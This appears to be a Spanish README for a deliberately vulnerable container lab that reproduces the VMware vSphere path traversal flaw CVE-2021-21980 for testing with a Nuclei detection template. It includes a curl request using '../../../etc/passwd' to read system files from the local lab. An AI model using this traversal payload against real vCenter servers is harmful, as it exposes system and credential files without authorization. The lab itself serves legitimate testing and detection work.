
Laboratorio vulnerable realista para CVE-2021-21980 (VMware vSphere Path Traversal) - Explotación real de archivos, no un servidor simulado
Entorno de prueba realista que simula la vulnerabilidad de salto de ruta (path traversal) del Cliente Web de VMware vSphere.
⚠️ ADVERTENCIA: Entorno de prueba vulnerable. ¡No lo expongas a Internet!
podman build -t vcenter-lab .
podman run -d -p 443:443 --name vcenter-lab vcenter-lab
curl -k "https://localhost/ui/vic-rest/services/containerView?id=../../../etc/passwd"
nuclei -t CVE-2021-21980.yaml -u https://localhost -debug
✅ Realmente lee archivos del sistema de archivos del contenedor usando E/S de archivos de Python
✅ Comportamiento realista - Maneja el salto de ruta (path traversal) como el vSphere real
✅ Cabeceras de VMware - Incluye Server: VMware-HTTP-Server/1.0
✅ SSL/TLS - Generación de certificados autofirmados
✅ No está codificado de forma fija (hardcoded) - Devuelve el contenido real de los archivos
Dockerfile - Configuración de compilación del contenedorserver.py - Aplicación Flask vulnerableCVE-2021-21980.yaml - Plantilla de detección de NucleiREADME.md - Este archivoEste laboratorio fue validado con Nuclei mostrando:
podman stop vcenter-lab && podman rm vcenter-lab